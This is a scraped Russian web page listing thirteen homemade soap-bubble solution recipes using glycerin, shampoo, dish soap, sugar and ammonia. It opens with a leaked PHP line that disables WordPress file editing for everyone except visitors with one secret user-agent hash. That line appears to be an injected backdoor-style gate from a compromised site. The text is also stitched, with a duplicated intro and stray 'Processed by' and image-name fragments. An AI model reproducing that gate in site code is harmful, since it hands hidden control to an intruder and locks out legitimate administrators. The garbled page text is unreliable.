if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 13 секретов хороших растворов для мыльных пузырей | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

13 секретов хороших растворов для мыльных пузырей

Разноцветные шары, которые кружат в воздухе и переливаются на солнце, приводят в восторг и взрослых, и детей. Вот почему они стали неотъемлемой частью любой вечеринки. Мыльные пузыри мгновенно создают атмосферу праздничности, фееричности и волшебства!

Раз­но­цвет­ные шары, кото­рые кру­жат в воз­ду­хе и пере­ли­ва­ют­ся на солн­це, при­во­дят в вос­торг и взрос­лых, и детей. Вот поче­му они ста­ли неотъ­ем­ле­мой частью любой вече­рин­ки. Мыль­ные пузы­ри мгно­вен­но созда­ют атмо­сфе­ру празд­нич­но­сти, фее­рич­но­сти и вол­шеб­ства! Им под силу рас­кра­сить ярки­ми цве­та­ми любой, даже самый серый, день.

Одна­ко пузы­ри домаш­не­го при­го­тов­ле­ния зача­стую про­иг­ры­ва­ют по каче­ству мага­зин­ным – быст­ро лопа­ют­ся, полу­ча­ют­ся малень­ки­ми и невы­ра­зи­тель­ны­ми. Это лег­ко попра­ви­мо, про­сто нуж­но знать сек­ре­ты хоро­ших составов.

Состав №1.

Сек­рет пер­во­го соста­ва в том, что сна­ча­ла гото­вит­ся слад­кий сироп: сахар рас­тво­ря­ет­ся в кипят­ке в про­пор­ци­ях 5:1. Затем в слад­кий сироп добав­ля­ет­ся мою­щее сред­ство. При этом обя­за­тель­но долж­но быть соблю­де­но соот­но­ше­ние меж­ду сиро­пом и сред­ством 20:1.

Состав №2.

Гото­вит­ся смесь из поло­ви­ны чаш­ки шам­пу­ня для детей (подой­дет, напри­мер, «Дра­кон­чик») и из дистил­ли­ро­ван­ной воды (при­мер­но пол­то­ры чаш­ки). В этой сме­си рас­тво­ря­ют­ся 2 чай­ные лож­ки саха­ра. К полу­чив­ше­му­ся объ­е­му рас­тво­ра необ­хо­ди­мо доба­вить такой же объ­ем глицерина.

Состав №3.

Дан­ный состав гото­вит­ся путем сме­ше­ния 3‑х сто­ло­вых ложек гли­це­ри­на, 200 мл шам­пу­ня (жела­тель­но дет­ско­го) и 400 мл дистил­ли­ро­ван­ной воды.

image13004

Состав №4.

Сле­ду­ю­щий рас­твор для мыль­ных пузы­рей — это смесь из воды, мою­ще­го сред­ства и гли­це­ри­на, заме­шан­ных в про­пор­ци­ях 16:3:1.

Состав №5.

Пона­до­бит­ся око­ло 500 мл воды, 10 мл гли­це­ри­на и 2 мл дет­ско­го шам­пу­ня, кото­рые необ­хо­ди­мо сме­шать. Реко­мен­ду­ет­ся доба­вить в рас­твор наша­тыр­ный спирт, что­бы смесь при­об­ре­ла про­зрач­ный оттенок.

Состав №6.

Эта смесь для мыль­ных пузы­рей гото­вит­ся из 400 мл дистил­ли­ро­ван­ной воды, 10 мл наша­тыр­но­го спир­та, 100 мл любо­го мою­ще­го сред­ства и 100 мл глицерина.

Состав №7.

Домаш­ние мыль­ные пузы­ри­го­то­вят­ся еще одним про­стым спо­со­бом: сто­ит сме­шать 200 мл хоро­ше­го мою­ще­го сред­ства, 600 мл дистил­ли­ро­ван­ной воды, а затем доба­вить 10 мл глицерина.

fonstola.ru-81360Состав №8.

Необ­хо­ди­мо сме­шать 600 мл горя­чей воды, 50 гр. мою­ще­го порош­ко­об­раз­но­го сред­ства, 300 мл гли­це­ри­на и 20 капель наша­тыр­но­го спир­та. Око­ло двух дней рас­твор наста­и­ва­ет­ся, а затем про­филь­тро­вы­ва­ет­ся и ста­вит­ся на какое-то вре­мя в холодильник.

Состав №9.

Для рас­тво­ра пона­до­бит­ся 300–400 мл шам­пу­ня (жела­тель­но дет­ско­го), 1 литр дистил­ли­ро­ван­ной воды и 150 мл глицерина.

Состав №10.

В дан­ный состав вхо­дит 500 мл поли­ви­ни­ло­во­го спир­та, 700 мл воды, 100 мл жид­ко­сти для мытья посу­ды и 40 мл глицерина.

Состав №11.

Смесь доста­точ­но про­стая, но важ­но соблю­сти про­пор­ции. Пона­до­бит­ся 200 гр. сред­ства для мытья посу­ды (толь­ко не для посу­до­мо­еч­ных машин!), 600 мл воды и 100 мл гли­це­ри­на. Всё хоро­шо пере­ме­шать и взболтать.

Состав №12.

Что­бы полу­чить еще один каче­ствен­ный рас­твор для мыль­ных пузы­рей, необ­хо­ди­мо рас­тво­рить 300 мл гли­це­ри­на в 600 мл горя­чей воды, доба­вить наша­тыр­но­го спир­та (20 капель доста­точ­но) и 50 гр. мою­ще­го сред­ства (порош­ко­об­раз­но­го). Смесь долж­на насто­ять­ся два-три дня. Затем, про­филь­тро­вав, поме­ща­ем её в холо­диль­ник. Через 12 часов рас­твор готов к применению.

Processed by: Helicon Filter;Состав №13.

Этот рас­твор мож­но назвать экс­пе­ри­мен­таль­ным. Для его при­го­тов­ле­ния пона­до­бит­ся хозяй­ствен­ное мыло, кото­рое нати­ра­ет­ся на круп­ной тер­ке. После это­го мыль­ные струж­ки необ­хо­ди­мо рас­тво­рить в горя­чей воде в про­пор­ции 1:1. Рас­твор наста­и­ва­ет­ся целую неде­лю, а на конеч­ном эта­пе в него добав­ля­ют­ся 2 чай­ные лож­ки саха­ра. После рас­тво­ре­ния саха­ра смесь готова.

Все основ­ные сек­ре­ты, как сде­лать мыль­ные пузы­ри, пере­чис­ле­ны. Воз­мож­но, пока­жет­ся, что соста­вы прак­ти­че­ски оди­на­ко­вые, но это не так.  Важ­ны про­пор­ции. И если они меня­ют­ся, то меня­ет­ся и каче­ство мыль­ных пузы­рей, их проч­ность и раз­ме­ры. Мыль­ные пузы­ри сво­и­ми рука­ми – это про­сто и не очень затрат­но, так что экс­пе­ри­мен­ти­руй­те, а глав­ное — не забудь­те потом устро­ить весе­лый тест-драйв всей семьей!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!